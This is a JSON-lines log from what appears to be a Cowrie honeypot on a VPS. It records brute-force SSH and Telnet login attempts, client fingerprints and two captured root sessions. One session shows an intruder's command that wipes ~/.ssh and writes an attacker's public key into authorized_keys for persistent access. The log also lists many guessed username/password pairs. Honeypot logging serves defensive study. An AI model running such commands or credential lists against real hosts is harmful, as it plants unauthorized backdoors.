{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:43:12.310770Z","src_ip":"58.144.199.22","session":"780c6f17e863"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwe123","message":"login attempt [postgres/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:43:12.947733Z","src_ip":"212.227.235.229","session":"24f77bb1da2b"}
{"eventid":"cowrie.login.failed","username":"mark","password":"mark2025","message":"login attempt [mark/mark2025] failed","sensor":"my-vps","timestamp":"2025-08-31T05:43:13.682365Z","src_ip":"58.144.199.22","session":"780c6f17e863"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:14.220267Z","src_ip":"212.227.235.229","session":"24f77bb1da2b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:14.883106Z","src_ip":"58.144.199.22","session":"780c6f17e863"}
{"eventid":"cowrie.session.closed","duration":12.769320249557495,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:19.102948Z","src_ip":"212.227.125.160","session":"44700e29a3c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35973,"dst_ip":"1.2.3.4","dst_port":23,"session":"8102028a2d79","protocol":"telnet","message":"New connection: 212.227.125.160:35973 (1.2.3.4:23) [session: 8102028a2d79]","sensor":"my-vps","timestamp":"2025-08-31T05:43:19.315100Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62382,"dst_ip":"1.2.3.4","dst_port":22,"session":"98b1e6d596aa","protocol":"ssh","message":"New connection: 217.72.205.35:62382 (1.2.3.4:22) [session: 98b1e6d596aa]","sensor":"my-vps","timestamp":"2025-08-31T05:43:22.396846Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:22.398098Z","src_ip":"217.72.205.35","session":"98b1e6d596aa"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":34756,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3d6728c0d8b","protocol":"ssh","message":"New connection: 43.159.36.188:34756 (1.2.3.4:22) [session: f3d6728c0d8b]","sensor":"my-vps","timestamp":"2025-08-31T05:43:22.503545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:43:22.505035Z","src_ip":"43.159.36.188","session":"f3d6728c0d8b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:43:22.749316Z","src_ip":"43.159.36.188","session":"f3d6728c0d8b"}
{"eventid":"cowrie.login.failed","username":"pzserver","password":"pzserver","message":"login attempt [pzserver/pzserver] failed","sensor":"my-vps","timestamp":"2025-08-31T05:43:23.768128Z","src_ip":"43.159.36.188","session":"f3d6728c0d8b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:25.014774Z","src_ip":"43.159.36.188","session":"f3d6728c0d8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51664,"dst_ip":"1.2.3.4","dst_port":22,"session":"f02942a48779","protocol":"ssh","message":"New connection: 212.227.235.229:51664 (1.2.3.4:22) [session: f02942a48779]","sensor":"my-vps","timestamp":"2025-08-31T05:43:30.608758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:43:30.611465Z","src_ip":"212.227.235.229","session":"f02942a48779"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:43:30.867230Z","src_ip":"212.227.235.229","session":"f02942a48779"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:43:31.158563Z","src_ip":"212.227.125.160","session":"5bf1307e3e25"}
{"eventid":"cowrie.login.failed","username":"terrariaserver","password":"terraria","message":"login attempt [terrariaserver/terraria] failed","sensor":"my-vps","timestamp":"2025-08-31T05:43:31.895498Z","src_ip":"212.227.235.229","session":"f02942a48779"}
{"eventid":"cowrie.session.closed","duration":12.807927370071411,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:32.122954Z","src_ip":"212.227.125.160","session":"8102028a2d79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36201,"dst_ip":"1.2.3.4","dst_port":23,"session":"d2e2d16d3abf","protocol":"telnet","message":"New connection: 212.227.125.160:36201 (1.2.3.4:23) [session: d2e2d16d3abf]","sensor":"my-vps","timestamp":"2025-08-31T05:43:32.355891Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35610,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6cacaea6172","protocol":"ssh","message":"New connection: 212.227.125.160:35610 (1.2.3.4:22) [session: e6cacaea6172]","sensor":"my-vps","timestamp":"2025-08-31T05:43:32.502302Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:33.155929Z","src_ip":"212.227.235.229","session":"f02942a48779"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":35088,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bad41dcd85c","protocol":"ssh","message":"New connection: 170.64.166.123:35088 (1.2.3.4:22) [session: 4bad41dcd85c]","sensor":"my-vps","timestamp":"2025-08-31T05:43:38.660587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:43:38.661802Z","src_ip":"170.64.166.123","session":"4bad41dcd85c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:43:38.937081Z","src_ip":"170.64.166.123","session":"4bad41dcd85c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52932,"dst_ip":"1.2.3.4","dst_port":22,"session":"61b4a10de624","protocol":"ssh","message":"New connection: 212.227.235.229:52932 (1.2.3.4:22) [session: 61b4a10de624]","sensor":"my-vps","timestamp":"2025-08-31T05:43:39.031997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:43:39.032779Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:43:39.318303Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1q2w3e4r5t","message":"login attempt [postgres/1q2w3e4r5t] failed","sensor":"my-vps","timestamp":"2025-08-31T05:43:40.079512Z","src_ip":"170.64.166.123","session":"4bad41dcd85c"}
{"eventid":"cowrie.login.success","username":"root","password":"newton","message":"login attempt [root/newton] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:43:40.500959Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:43:41.090493Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:43:41.091199Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:43:41.092347Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:41.369233Z","src_ip":"170.64.166.123","session":"4bad41dcd85c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:41.378971Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:43:42.007235Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:43:42.007971Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:43:42.295931Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:42.296879Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54420,"dst_ip":"1.2.3.4","dst_port":22,"session":"43536d5ffed7","protocol":"ssh","message":"New connection: 212.227.235.229:54420 (1.2.3.4:22) [session: 43536d5ffed7]","sensor":"my-vps","timestamp":"2025-08-31T05:43:42.582543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:43:42.583730Z","src_ip":"212.227.235.229","session":"43536d5ffed7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:43:42.869230Z","src_ip":"212.227.235.229","session":"43536d5ffed7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58544,"dst_ip":"1.2.3.4","dst_port":22,"session":"2aa1d29b176a","protocol":"ssh","message":"New connection: 212.227.235.229:58544 (1.2.3.4:22) [session: 2aa1d29b176a]","sensor":"my-vps","timestamp":"2025-08-31T05:43:43.879437Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:43:44.051183Z","src_ip":"212.227.235.229","session":"43536d5ffed7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:43:44.510045Z","src_ip":"212.227.235.229","session":"2aa1d29b176a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:43:44.510891Z","src_ip":"212.227.235.229","session":"2aa1d29b176a"}
{"eventid":"cowrie.session.closed","duration":12.769264936447144,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:45.125083Z","src_ip":"212.227.125.160","session":"d2e2d16d3abf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36422,"dst_ip":"1.2.3.4","dst_port":23,"session":"24751aa2ef0c","protocol":"telnet","message":"New connection: 212.227.125.160:36422 (1.2.3.4:23) [session: 24751aa2ef0c]","sensor":"my-vps","timestamp":"2025-08-31T05:43:45.326089Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:45.338287Z","src_ip":"212.227.235.229","session":"43536d5ffed7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55776,"dst_ip":"1.2.3.4","dst_port":22,"session":"11cfeebb7084","protocol":"ssh","message":"New connection: 212.227.235.229:55776 (1.2.3.4:22) [session: 11cfeebb7084]","sensor":"my-vps","timestamp":"2025-08-31T05:43:45.627027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:43:45.629574Z","src_ip":"212.227.235.229","session":"11cfeebb7084"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:43:45.918802Z","src_ip":"212.227.235.229","session":"11cfeebb7084"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:43:47.115094Z","src_ip":"212.227.235.229","session":"11cfeebb7084"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:47.402948Z","src_ip":"212.227.235.229","session":"61b4a10de624"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:47.405760Z","src_ip":"212.227.235.229","session":"11cfeebb7084"}
{"eventid":"cowrie.session.closed","duration":"66.2","message":"Connection lost after 66.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:43:49.065331Z","src_ip":"212.227.125.160","session":"5bf1307e3e25"}
